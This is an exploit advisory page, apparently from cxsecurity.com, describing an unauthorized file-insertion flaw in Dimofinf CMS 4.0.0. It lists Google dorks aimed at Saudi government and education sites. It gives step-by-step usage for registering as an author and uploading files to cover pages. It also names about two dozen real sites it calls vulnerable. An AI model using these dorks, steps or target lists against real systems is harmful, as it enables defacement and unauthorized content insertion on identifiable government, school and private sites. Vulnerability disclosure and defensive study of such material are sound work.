Powered By Dimofinf CMS Version 4.0.0 Saudi-Arabia Government Unauthorized Arbitrary Insert File Vulnerability

2018.11.12
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264

################################################################################################# # Exploit Title : Powered By Dimofinf CMS Version 4.0.0 Saudi-Arabia Government Unauthorized Arbitrary Insert File Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 13/11/2018 # Vendor Homepage : dimofinf.net # Tested On : Windows and Linux # Category : WebApps # Version Information : 4.0.0 # Google Dorks : intext:''Powered by Dimofinf cms Version 4.0.0'' site:gov.sa intext:''Powered by Dimofinf cms Version 4.0.0'' site:edu.sa intext:''Powered by Dimofinf cms Version 4.0.0'' site:com intext:''Powered by Dimofinf cms Version 4.0.0'' site:org intext:''Powered by Dimofinf cms Version 4.0.0'' site:net intext:''Powered by Dimofinf cms Version 4.0.0'' site:org.sa intext:''Powered by Dimofinf cms Version 4.0.0'' site:com.sa intext: Powered by Dimofinf cms Version 4.0.0 Copyright© Dimensions Of Information Ltd.'' site:sa inurl:''/include/plugins/news/news.php?action=save&m=news&id='' site:sa inurl:''/content.php?action=save&m=content&id='' site:sa # Exploit Risk : Medium # CWE : CWE-264 - [ Permissions, Privileges, and Access Controls ] ################################################################################################# # Exploit Usage : 1) Register yourself as Author [ username - password - e-mail address [ confirmation is important ] 2) /register.php?action=register 3) Approve your e-mail address. - And then you will be in the author area. 4) TARGET/profile.php?action=[YOUR-PROFILE-NUMBER] target/profile/[YOUR-PROFILE-NUMBER] + TARGET/register.php?action=activate&userid=[YOUR-PROFILE-NUMBER]&activid=[ACTIVATION-CODE-HERE] 5) After successful registration and confirmation - Find this word under your profile رفع صورة خلفية الغلاف Click and insert your image file. 6) Your image file will cover the whole page. 7) Directory Path : TARGET/contents/covers/[YOUR-PROFILE-NUMBER].jpg .gif .png Note : Only this file extensions are allowed : bmp - gif - jpe - jpeg - jpg - png - tif - tiff # Another File Insertion Exploit Usage : Exploit : /short_url/l /short_url-action-l.htm TARGET/[RANDOM-NUMBER] TARGET/short_url-action-s-id-[RANDOM-NUMBER].htm ################################################################################################# # Example Vulnerable Sites => [+] nashatghasa.edu.sa/site => [ Proof of Concept for Vulnerability ] => archive.fo/n6Qt3 [+] ssb.edu.sa - [+] alfurqan.edu.sa [+] rawdahedu.gov.sa [+] taifnashat.gov.sa [+] sukar.org.sa [+] sufayri.gov.sa/news [+] ulaedu.gov.sa/inf [+] msi.gov.sa/ar [+] nre.gov.sa [+] darco.sa [+] albosor-m.gov.sa [+] al-7b.com [+] aldukhainy.com [+] khadegah.com [+] elshal.com [+] seen.com.sa [+] arabfp.org [+] neprass.org [+] albrbalasmer.org [+] jobs-ksa.net [+] faifaedu.net [+] arabsea.com.sa [+] sadaalma.com.sa [+] tanmiah9.org.sa [+] sadawan.com ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top